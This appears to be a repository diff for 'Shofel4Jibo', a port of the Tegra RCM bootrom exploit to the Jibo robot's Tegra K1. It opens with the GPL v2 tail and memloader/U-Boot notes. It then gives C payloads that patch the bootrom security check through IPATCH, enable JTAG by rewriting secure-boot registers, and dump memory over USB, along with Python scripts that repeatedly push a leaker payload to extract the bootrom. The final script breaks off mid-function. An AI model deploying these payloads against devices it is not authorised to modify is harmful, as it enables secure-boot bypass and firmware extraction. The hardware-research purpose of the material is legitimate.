that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

14
Shofel4Jibo/memloader/mm/README.txt Normal file
View File

@@ -0,0 +1,14 @@
memloader v3 (01.12.2018)
Parses ini files from microsd root and loads/decompresses/boots the appropriate binaries on the AArch64 CPU of the Nintendo Switch.
Ini files can be generated from source images using the programs inside tools subdirectory. Currently the tools understand coreboot CBFS images or ELF payloads (like u-boot).
Usage
Either put the appropriate ini+binary files onto your microsd card before inserting it into your Switch, or pass the --dataini parameter to TegraRcmSmash.exe to load them via USB.
Send the memloader.bin to your Switch running in RCM mode via a fusee-launcher (sudo ./fusee-launcher.py memloader.bin or just drag and drop it onto TegraRcmSmash.exe on Windows)
Follow the on-screen menu.
For updates check https://switchtools.sshnuke.net
Source code available at https://github.com/rajkosto/memloader
**I am not responsible for anything, including dead switches, loss of life, or total nuclear annihilation.**

28
Shofel4Jibo/memloader/mm/sample/uboot/BUILD.txt Normal file
View File

@@ -0,0 +1,28 @@
U-Boot source from https://github.com/fail0verflow/switch-u-boot.git (at the time, commit a2d885d448eacb72085f262f9b28951384a8e678 was the latest, which was used)
After the clone, the following changes were made before build:
In arch/arm/dts/tegra210-nintendo-switch.dts: max-frequency = <200000000>; was added to the end of sdhci@700b0000 and sdhci@700b0600 sections (for stability)
After make nintendo-switch_defconfig, the resulting .config file was edited to have CONFIG_BOOTDELAY=0 , CONFIG_USE_BOOTCOMMAND=y and CONFIG_BOOTCOMMAND="source 80100000"
For compatibility/driver reasons, .config file was edited again to have CONFIG_USB_GADGET_VENDOR_NUM=0x10C4 and CONFIG_USB_GADGET_PRODUCT_NUM=0x8B01
In make menuconfig, the following options were unselected to prevent partition/filesystem scanning (which adds delays and can fail) before the bootcommand is executed:
General setup:
Uncheck "Select defaults suitable for booting general purpose Linux distributions"
Command line interface -> Device access commands:
Uncheck "part"
Command line interface -> Filesystem commands:
Uncheck "ext2 commmand support"
Uncheck "ext4 commmand support"
Uncheck "FAT command support"
Uncheck "filesystem commands"
Partition types:
Uncheck "Enable MS Dos partition table"
Uncheck "Enable ISO partition table"
Uncheck "Enable EFI GPT partition table"
File systems:
Uncheck "Enable FAT filesystem support"
Then a make was issued which built the u-boot.elf, included in this binary release
The *.scr.img files were built with the following commands:
./tools/mkimage -A arm64 -T script -C none -n "eMMC ums mode" -d ums_emmc.scr ums_emmc.scr.img
./tools/mkimage -A arm64 -T script -C none -n "eMMC boot0 ums mode" -d ums_emmc_boot0.scr ums_emmc_boot0.scr.img
./tools/mkimage -A arm64 -T script -C none -n "eMMC boot1 ums mode" -d ums_emmc_boot1.scr ums_emmc_boot1.scr.img
./tools/mkimage -A arm64 -T script -C none -n "sd ums mode" -d ums_sd.scr ums_sd.scr.img

1
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc.scr Normal file
View File

@@ -0,0 +1 @@
ums 1 mmc 0.0

BIN
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc.scr.img Normal file
View File

Binary file not shown.

1
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc_boot0.scr Normal file
View File

@@ -0,0 +1 @@
ums 1 mmc 0.1

BIN
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc_boot0.scr.img Normal file
View File

Binary file not shown.

1
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc_boot1.scr Normal file
View File

@@ -0,0 +1 @@
ums 1 mmc 0.2

BIN
Shofel4Jibo/memloader/mm/sample/uboot/ums_emmc_boot1.scr.img Normal file
View File

Binary file not shown.

2
Shofel4Jibo/memloader/mm/sample/uboot/ums_sd.scr Normal file
View File

@@ -0,0 +1,2 @@
ums 1 mmc 1

BIN
Shofel4Jibo/memloader/mm/sample/uboot/ums_sd.scr.img Normal file
View File

Binary file not shown.

14
Shofel4Jibo/memloader/mm/sample/ums_boot0.ini Normal file
View File

@@ -0,0 +1,14 @@
[load:PH_0]
if=uboot/u-boot.elf
skip=0x00010000
count=0x0006e13f
dst=0x80110000
[load:script]
if=uboot/ums_emmc_boot0.scr.img
dst=0x80100000
[boot:ENTRY]
pc=0x80110000
maxMemoryFreq=200
pwroffHoldTime=4

14
Shofel4Jibo/memloader/mm/sample/ums_boot1.ini Normal file
View File

@@ -0,0 +1,14 @@
[load:PH_0]
if=uboot/u-boot.elf
skip=0x00010000
count=0x0006e13f
dst=0x80110000
[load:script]
if=uboot/ums_emmc_boot1.scr.img
dst=0x80100000
[boot:ENTRY]
pc=0x80110000
maxMemoryFreq=-1600
pwroffHoldTime=4

13
Shofel4Jibo/memloader/mm/sample/ums_emmc.ini Normal file
View File

@@ -0,0 +1,13 @@
[load:PH_0]
if=uboot/u-boot.elf
skip=0x00010000
count=0x0006e13f
dst=0x80110000
[load:script]
if=uboot/ums_emmc.scr.img
dst=0x80100000
[boot:ENTRY]
pc=0x80110000
pwroffHoldTime=4

13
Shofel4Jibo/memloader/mm/sample/ums_sd.ini Normal file
View File

@@ -0,0 +1,13 @@
[load:PH_0]
if=uboot/u-boot.elf
skip=0x00010000
count=0x0006e13f
dst=0x80110000
[load:script]
if=uboot/ums_sd.scr.img
dst=0x80100000
[boot:ENTRY]
pc=0x80110000
pwroffHoldTime=4

BIN
Shofel4Jibo/memloader/mm/tools/blzcomp.exe Normal file
View File

Binary file not shown.

BIN
Shofel4Jibo/memloader/mm/tools/cbfs2ini.exe Normal file
View File

Binary file not shown.

BIN
Shofel4Jibo/memloader/mm/tools/elf2ini.exe Normal file
View File

Binary file not shown.

BIN
Shofel4Jibo/memloader/mm/tools/kip1decomp.exe Normal file
View File

Binary file not shown.

24
Shofel4Jibo/payloads/boot_bct.c Normal file
View File

@@ -0,0 +1,24 @@
#include "types.h"
#include "t124.h"
typedef void (*do_bct_boot_t)( void );
void memcpy( void *dst, const void *src, size_t len ) {
for ( size_t i = 0; i < len; i++ ) {
( (u8 *)dst )[i] = ( (u8 *)src )[i];
}
}
__attribute__((section(".init")))
void entry() {
memcpy( (void*) ( IRAM_END - IROM_LEN + 1 ), (void*) IROM_BEGIN, IROM_LEN );
register do_bct_boot_t do_bct_boot = (do_bct_boot_t) ( BOOTROM_DO_BCT_BOOT | 1 );
do_bct_boot();
while(1);
}

55
Shofel4Jibo/payloads/intermezzo.c Normal file
View File

@@ -0,0 +1,55 @@
#include "types.h"
#include "t124.h"
extern u32 __payload_bin_start;
extern u32 __payload_bin_end;
typedef void (*post_relocation_t)( void );
typedef void (*payload_ep_t)( void );
typedef void (*_memcpy_t)( void *dst, const void *src, size_t len );
void _memcpy( void *dst, const void *src, size_t len ) {
for ( size_t i = 0; i < len; i++ ) {
( (u8 *)dst )[i] = ( (u8 *)src )[i];
}
}
// Probably I could trust in have relative PC branches, so no address would
// require to be updated. This would work since there is a whole new copy
// of the binary on the relocated area and PC would be working on that area
// but having memcpy address on a register and update it to the relocated
// area when required should improve the chances of the compiler not messing
// up with the memcpy calls.
register _memcpy_t memcpy asm("r7");
void _post_relocation() {
// Same with these arguments....
register u32 payload_bef_len = *( (u32 *) IRAM_ADD_PAYLOAD_BEF_LENVAR );
register u32 payload_aft_len = *( (u32 *) IRAM_ADD_PAYLOAD_AFT_LENVAR );
register u32 payload_thumb_mode = *( (u32 *) IRAM_ADD_PAYLOAD_THUMB_MODE );
memcpy -= INTERMEZZO_LEN;
memcpy( (u8 *) BOOTROM_PAYLOAD_ENTRY, (u8 *) IRAM_ADD_PAYLOAD_START, payload_bef_len );
memcpy( (u8 *) (BOOTROM_PAYLOAD_ENTRY + payload_bef_len), (u8 *) IRAM_ADD_PAYLOAD_CONT, payload_aft_len );
payload_ep_t payload_ep = (payload_ep_t) ( BOOTROM_PAYLOAD_ENTRY | payload_thumb_mode );
payload_ep();
}
__attribute__((section(".init")))
void pre_relocation() {
u32 payload_bin_size = (u32)&__payload_bin_end - (u32)&__payload_bin_start;
u8 *dest = (u8 *) ( BOOTROM_PAYLOAD_ENTRY - INTERMEZZO_LEN );
memcpy = _memcpy;
memcpy( dest, &__payload_bin_start, payload_bin_size );
post_relocation_t post_relocation = _post_relocation - INTERMEZZO_LEN;
post_relocation();
}

41
Shofel4Jibo/payloads/ipatch_rcm.c Normal file
View File

@@ -0,0 +1,41 @@
/* Based on similar payload by ktemkin
* https://gist.github.com/ktemkin/825d5f4316f63a7c11ea851a2022415a
*/
#include "types.h"
#include "t124.h"
#define _REG(base, off) *(volatile unsigned int *)((base) + (off))
#define reg_write(base, off, value) _REG(base, off) = value
#define reg_clear(base, off, value) _REG(base, off) &= ~value
#define reg_set(base, off, value) _REG(base, off) |= value
/**
* Patches over a given address in the IROM using the IPATCH hardware.
*/
void ipatch_word(u8 slot, u32 addr, u16 new_value)
{
u32 slot_value;
u32 offset;
// Mark the relevant ipatch slot as not-in-use.
reg_clear(IPATCH_BASE, IPATCH_SELECT, (1 << slot));
// Compute the new patch value.
offset = (addr & 0xFFFF) >> 1;
slot_value = (offset << 16) | new_value;
// Figure out the location of the slot to touch.
reg_write(IPATCH_BASE, IPATCH_REGS + (slot * 4), slot_value);
// Apply the new one.
reg_set(IPATCH_BASE, IPATCH_SELECT, (1 << slot));
}
__attribute__((section(".init")))
void entry() {
ipatch_word(1, BOOTROM_GET_SECURITY_MODE, 0x2000);
register entry_point entry = (entry_point) ( 0x00101128 | 1 );
entry();
}

40
Shofel4Jibo/payloads/jtag_example.c Normal file
View File

@@ -0,0 +1,40 @@
#include "t124.h"
#include "types.h"
static inline u32 read32(uintptr_t addr) {
return *(vu32 *)addr;
}
static inline void write32(uintptr_t addr, u32 val) {
*(vu32 *)addr = val;
}
static inline void or32(uintptr_t addr, u32 val) {
write32(addr, read32(addr) | val);
}
__attribute__(( section(".init") ))
void main() {
u32 pirom_start_0 = 0x00010000;
write32( SECURE_BOOT_BASE + SB_PIROM_START_0, pirom_start_0 );
u32 sb_csr_0 = 0x00000010;
write32( SECURE_BOOT_BASE + SB_CSR_0, sb_csr_0 );
u32 sb_pfcfg_0 = read32( SECURE_BOOT_BASE + SB_PFCFG_0 );
sb_pfcfg_0 &= 0xfffffff0;
sb_pfcfg_0 |= 0xf;
write32( SECURE_BOOT_BASE + SB_PFCFG_0, sb_pfcfg_0 );
or32( APB_BASE + APB_MISC_PP_CONFIG_CTL_0, APB_MISC_PP_CONFIG_CTL_0_JTAG |
APB_MISC_PP_CONFIG_CTL_0_TBE );
while(1) {
// Halt COP and wait for JTAG
or32( FLOW_CTLR_BASE + FLOW_CTLR_HALT_COP_EVENTS_0,
FLOW_CTLR_HALT_COP_FLOW_MODE_WAITEVENT |
FLOW_CTLR_HALT_COP_JTAG );
}
}

58
Shofel4Jibo/payloads/mem_dumper_usb_server.c Normal file
View File

@@ -0,0 +1,58 @@
#include "types.h"
#include "t124.h"
#include "mem_dumper_usb_server.h"
typedef void (*ep1_x_imm_t)(void *buffer, u32 size, u32 *num_xfer);
void memcpy( void *dst, const void *src, size_t len ) {
for ( size_t i = 0; i < len; i++ ) {
( (u8 *)dst )[i] = ( (u8 *)src )[i];
}
}
static inline u32 read32(uintptr_t addr) {
return *(vu32 *)addr;
}
static inline void write32(uintptr_t addr, u32 val) {
*(vu32 *)addr = val;
}
static inline void or32(uintptr_t addr, u32 val) {
write32(addr, read32(addr) | val);
}
void enter_rcm() {
or32(PMC_BASE + PMC_SCRATCH0, PMC_SCRATCH0_MODE_RCM);
or32(PMC_BASE + PMC_CNTRL, PMC_CNTRL_MAIN_RST);
}
__attribute__((section(".init")))
void entry() {
u32 num_xfer;
u32 to_send;
struct mem_dumper_args_s args;
u8 *buffer = (u8*)0x40020000;
ep1_x_imm_t ep1_out_read_imm = (ep1_x_imm_t) ( BOOTROM_EP1_OUT_READ_IMM | 1 );
ep1_x_imm_t ep1_in_write_imm = (ep1_x_imm_t) ( BOOTROM_EP1_IN_WRITE_IMM | 1 );
ep1_out_read_imm( &args, sizeof(args), &num_xfer );
while ( args.len > 0 ) {
to_send = args.len > 0x1000? 0x1000 : args.len;
memcpy( buffer, (void*)args.start, to_send );
ep1_in_write_imm( buffer, to_send, &num_xfer );
args.start += to_send;
args.len -= to_send;
}
enter_rcm();
}

16
Shofel4Jibo/payloads/payload.ld Normal file
View File

@@ -0,0 +1,16 @@
__payload_bin_start = 0x4000E000;
ENTRY(__payload_bin_start)
SECTIONS {
/* We don't do GOT relocation and rely on nothing ending up using the GOT
* (-fno-common helps here) */
/DISCARD/ : { *(.comment) }
.init (__payload_bin_start): { *(.init) *(.init.*) }
.text : { *(.text) *(.text.*) }
.data : { *(.data) *(.data.*) }
.rodata : { *(.rodata) *(.rodata.*) *(.got) }
.got : { *(.got) }
.bss : { *(.bss) *(.bss.*) *(COMMON)}
.footer : { LONG(0xdeadbeef) } /* make sure .bss is padded out */
__payload_bin_end = .;
}

20
Shofel4Jibo/payloads/reset_example.c Normal file
View File

@@ -0,0 +1,20 @@
#include "t124.h"
#include "types.h"
static inline u32 read32(uintptr_t addr) {
return *(vu32 *)addr;
}
static inline void write32(uintptr_t addr, u32 val) {
*(vu32 *)addr = val;
}
static inline void or32(uintptr_t addr, u32 val) {
write32(addr, read32(addr) | val);
}
__attribute__((section(".init")))
void main() {
or32(PMC_BASE + PMC_CNTRL, PMC_CNTRL_MAIN_RST);
}

1
Shofel4Jibo/target_config.h Normal file
View File

@@ -0,0 +1 @@
#define TARGET_ADDR 0x40000004

BIN
depricated payloads/pre built/boot_bct.bin Executable file
View File

Binary file not shown.

BIN
depricated payloads/pre built/fastboot.bin Executable file
View File

Binary file not shown.

BIN
depricated payloads/pre built/flag.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/hello.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/intermezzo.bin Executable file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_bct_area.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_bct_dump.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_blink.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_bootrom.bin Normal file
View File

Binary file not shown.

1
depricated payloads/pre built/jibo_bootrom_final.bin Normal file
View File

@@ -0,0 +1 @@
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>

1
depricated payloads/pre built/jibo_bootrom_full.bin Normal file
View File

File diff suppressed because one or more lines are too long

0
depricated payloads/pre built/jibo_bootrom_leak.bin Normal file
View File

1
depricated payloads/pre built/jibo_bootrom_recovered.bin Normal file
View File

@@ -0,0 +1 @@
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

BIN
depricated payloads/pre built/jibo_clocks.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_deep_dump.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_exit.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_fuses.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_hardware_state.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_intercept.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_iram_brute.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_iram_full.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_leak.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_leak_ram.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_leaker.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_mosfet_uart.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_mule.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_mulev2.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_ping.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_pmc_state.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_signal.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/jibo_sram_dump.bin Normal file
View File

Binary file not shown.

1
depricated payloads/pre built/jibo_test.bin Normal file
View File

@@ -0,0 +1 @@
<EFBFBD>

BIN
depricated payloads/pre built/jtag_example.bin Executable file
View File

Binary file not shown.

BIN
depricated payloads/pre built/mem_dumper_usb_server.bin Executable file
View File

Binary file not shown.

BIN
depricated payloads/pre built/ping.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/pmic_wake.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/ports.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/power.bin Normal file
View File

Binary file not shown.

1
depricated payloads/pre built/rom_test.bin Normal file
View File

@@ -0,0 +1 @@
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>

BIN
depricated payloads/pre built/stay_alive.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/test_256.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/toggle.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/u-boot.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/usb_echo.bin Normal file
View File

Binary file not shown.

BIN
depricated payloads/pre built/verify.bin Normal file
View File

Binary file not shown.

52
depricated payloads/python support scripts/jibo_boot_dump.py Normal file
View File

@@ -0,0 +1,52 @@
import os
import time
import subprocess
# Settings
START_ADDR = 0xFFF00000
END_ADDR = 0xFFF10000
OUTPUT_FILE = os.path.abspath("jibo_bootrom_full.bin")
CHUNK_FILE = os.path.abspath("chunk.bin")
TOOL_PATH = os.path.abspath("./shofel2_t124")
def run_cmd(cmd):
# Added stderr capture to help debug if the tool itself errors out
return subprocess.run(cmd, shell=True, capture_output=True, text=True)
print(f"[*] Starting leak from 0x{START_ADDR:08X} to 0x{END_ADDR:08X}")
with open(OUTPUT_FILE, "ab") as f:
for addr in range(START_ADDR, END_ADDR, 4):
# ...
# 1. PUSH PAYLOAD
# Add a 1-second delay before pushing to let USB stabilize
time.sleep(1.0)
run_cmd(f"{TOOL_PATH} PAYLOAD jibo_leaker.bin arm")
# 2. WAIT FOR RESET
print("[*] Waiting for device to cycle...", end="\r")
# Ensure the device actually disappears and reappears
while b"0955:7740" in subprocess.run("lsusb", shell=True, capture_output=True).stdout:
time.sleep(0.1) # Wait for it to disconnect
while b"0955:7740" not in subprocess.run("lsusb", shell=True, capture_output=True).stdout:
time.sleep(0.5) # Wait for it to reconnect
time.sleep(1.5) # Crucial "Cool Down" for the BootROM stack
# 3. DUMP
dump_res = run_cmd(f"{TOOL_PATH} MEM_DUMP 0x7000e450 0x4 {CHUNK_FILE}")
# 4. Save to file
if os.path.exists(CHUNK_FILE):
with open(CHUNK_FILE, "rb") as chunk:
data = chunk.read()
if len(data) == 4:
f.write(data)
f.flush()
os.remove(CHUNK_FILE)
else:
print(f"\n[!] Error: chunk.bin not found at 0x{addr:08X}")
print(f"[!] Tool Output: {dump_res.stdout}")
print(f"[!] Tool Error: {dump_res.stderr}")
break

101
depricated payloads/python support scripts/jibo_drain.py Normal file
View File

@@ -0,0 +1,101 @@
import usb.core
import usb.util
import time
import subprocess
import struct
# Tegra K1 Constants
ID_VENDOR = 0x0955
ID_PRODUCT = 0x7740
# Memory Range to Dump
START_ADDR = 0x40000000
END_ADDR = 0x40040000 # 256KB total
STEP = 4 # 4 bytes per reboot
def get_jibo():
dev = usb.core.find(idVendor=ID_VENDOR, idProduct=ID_PRODUCT)
if dev is not None:
try:
# Check if a kernel driver is using the device and detach it
if dev.is_kernel_driver_active(0):
